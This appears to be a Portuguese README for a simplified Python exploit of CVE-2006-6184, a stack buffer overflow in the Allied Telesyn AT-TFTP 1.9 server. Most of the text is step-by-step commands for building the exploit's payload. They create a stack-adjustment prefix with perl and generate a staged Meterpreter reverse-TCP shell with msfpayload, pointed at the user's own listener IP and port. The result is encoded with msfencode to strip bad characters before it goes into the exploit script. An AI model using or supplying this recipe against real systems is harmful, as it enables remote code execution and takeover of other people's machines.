
versão simplificada de https://github.com/shauntdergrigorian/cve-2006-6184
Este é um exploit autônomo baseado em Python para CVE-2006-6184. Este exploit desencadeia um estouro de buffer baseado em pilha no Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possivelmente versões anteriores, permitindo que atacantes remotos causem uma negação de serviço ou executem código arbitrário.
Você não achou que seria tão fácil, achou? O payload deve ser personalizado para incluir seu próprio endereço IP e porta de escuta, então você precisará gerá-lo você mesmo. Para isso, siga os seguintes passos:
1.) Digite o seguinte para criar um arquivo hex da quantidade que precisa ser subtraída do ponteiro de pilha (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Em seguida, use o seguinte comando para criar um payload de shell meterpreter em etapas:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Então, combine os dois arquivos que você acabou de criar.
cat stackadj payload > shellcode
4.) Finalmente, vamos eliminar os caracteres ruins.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
Insira a saída como o valor da variável "payload".